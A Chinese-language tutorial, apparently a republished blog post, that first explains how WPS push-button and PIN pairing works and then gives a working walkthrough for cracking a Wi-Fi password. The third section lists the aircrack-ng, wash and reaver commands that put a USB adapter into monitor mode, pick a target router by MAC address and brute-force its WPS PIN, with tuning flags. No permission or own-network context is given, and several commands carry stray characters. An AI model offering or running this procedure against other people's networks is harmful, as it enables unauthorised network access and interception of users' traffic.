1. WPS認(rèn)證機(jī)制

WPS(Wi-Fi Protected Setup，Wi-Fi保護(hù)設(shè)置)(有的叫做AOSS、有的叫做QSS，不過(guò)功能都一致。)是由Wi-Fi聯(lián)盟組織實(shí)施的認(rèn)證項(xiàng)目，主要致力于簡(jiǎn)化無(wú)線局域網(wǎng)的安裝及安全性能配置工作。在傳統(tǒng)方式下，用戶(hù)新建一個(gè)無(wú)線網(wǎng)絡(luò)時(shí)，必須在接入點(diǎn)手動(dòng)設(shè)置網(wǎng)絡(luò)名(SSID)和安全密鑰，然后在客戶(hù)端驗(yàn)證密鑰以阻止“不速之客”的闖入。這整個(gè)過(guò)程需要用戶(hù)具備Wi-Fi設(shè)備的背景知識(shí)和修改必要配置的能力。Wi- Fi Protected Setup能幫助用戶(hù)自動(dòng)設(shè)置網(wǎng)絡(luò)名(SSID)、配置強(qiáng)大的WPA數(shù)據(jù)編碼及認(rèn)證功能，用戶(hù)只需輸入個(gè)人信息碼(PIN方法)或按下按鈕(按鈕設(shè)置，或稱(chēng)PBC)，即能安全地連入WLAN。這大大簡(jiǎn)化了無(wú)線安全設(shè)置的操作。Wi-Fi Protected Setup支持多種通過(guò)Wi-Fi認(rèn)證的802.11產(chǎn)品，包括接入點(diǎn)、無(wú)線適配器、Wi-Fi電話以及其他消費(fèi)性電子設(shè)備。

WPS可以幫助客戶(hù)端用戶(hù)自動(dòng)配置網(wǎng)絡(luò)名(SSID)及無(wú)線加密密鑰。對(duì)于普通用戶(hù)來(lái)說(shuō)，無(wú)需了解SSID和安全密鑰的概念就能實(shí)現(xiàn)安全連接;而且用戶(hù)的安全密鑰不可能被外人破解，因?yàn)樗请S機(jī)產(chǎn)生的;最重要的是用戶(hù)無(wú)需記憶冗長(zhǎng)的無(wú)線加密密碼，避免了忘記密碼的麻煩。

wps認(rèn)證AP操作說(shuō)明

1、在支持WPS的AP設(shè)備上一般會(huì)有一個(gè)按鈕，按下這個(gè)按鈕，在一定的時(shí)間內(nèi)(通常為120s)它會(huì)等待客戶(hù)設(shè)備連接。在網(wǎng)頁(yè)的管理界面也有對(duì)應(yīng)的操作，二者選其一即可。

2、按下網(wǎng)卡設(shè)備的WPS連接按鈕(有些是QSS、AOSS等)去連接AP。(也可輸入PIN碼連接，需要AP做對(duì)應(yīng)的設(shè)置)。

3、無(wú)線網(wǎng)卡和WPS認(rèn)證的AP建立起連接。

WPS連接操作如diagram-WPS圖示意

[[131446]] 

 #p#

2. 連接WPS機(jī)制的WIFI 認(rèn)證過(guò)程

并非所有的手機(jī)型號(hào)和ROM支持WPS認(rèn)證的網(wǎng)絡(luò)連接，有些是支持的，以天語(yǔ)的K-touch w806(大黃蜂)為例，說(shuō)一下手機(jī)連接WPS的相關(guān)操作。

在“設(shè)置”——“無(wú)線和網(wǎng)絡(luò)”——“wlan設(shè)置”下，有個(gè)添加WPS網(wǎng)絡(luò)的選項(xiàng)，點(diǎn)擊會(huì)有兩個(gè)選項(xiàng)可選，分別為兩種接入方式，一種是輸入PIN碼，另一種是按鍵。

連接成功后，路由器(AP)管理頁(yè)面顯示如下：

用wireshark進(jìn)行分析。通過(guò)設(shè)置過(guò)濾，可以大致看到WPS認(rèn)證連接大體過(guò)程。

繪制成流程圖，大致過(guò)程如下：

 #p#

3. WIFI密碼破解過(guò)程

打開(kāi)終端 輸入 ifconfig wlan0 up” 加載usb網(wǎng)卡。

ifconfig wlan0 up

接下來(lái)“airmon-ng start wlan0” 監(jiān)聽(tīng)模式已激活到了mon0。

airmon-ng start wlan0

注：wlan0并不一定是固定的，插入其他的usb網(wǎng)卡系統(tǒng)會(huì)自動(dòng)的以wlan1，wlan2等命名。usb網(wǎng)卡需要系統(tǒng)支持。推薦RTF8187系列，本人親測(cè)穩(wěn)定可用。

查看周邊路由AP的信息。記錄下你要學(xué)習(xí)的路由MAC地址。

airodump-ng mon0”1

特別提示：只有AP開(kāi)啟了WPS、QSS功能，才可以用PIN法學(xué)習(xí)PSK密碼!

使用wash命令查看周?chē)鸁o(wú)線wifi的屬性,C是大寫(xiě)在wps locked一項(xiàng)中有顯示的

wash -i mon0 -C1

抓PIN包，枚舉PIN碼

reaver -i mon0 -b 目標(biāo)mac地址 -a -S -vv1

注意:

MAC地址中冒號(hào)不可省略，MAC地址的字母大小寫(xiě)均可，-S是大寫(xiě)字母， -vv

是兩個(gè)V不是W!

-i 監(jiān)聽(tīng)后接口名稱(chēng)

-b 目標(biāo)mac地址

-a 自動(dòng)檢測(cè)目標(biāo)AP***配置

-S 使用最小的DH key(可以提高PJ速度)

-vv 顯示更多的非嚴(yán)重警告

-d 即delay每窮舉一次的閑置時(shí)間 預(yù)設(shè)為1秒

-t 即timeout每次窮舉等待反饋的最長(zhǎng)時(shí)間

-c指定頻道可以方便找到信號(hào)，如-c1 指定1頻道，大家查看自己的目標(biāo)頻道做相應(yīng)修改 (非TP-LINK路由推薦–d9 –t9參數(shù)防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)。

剩下的就是漫長(zhǎng)的等待，要有耐心!!!

祝好!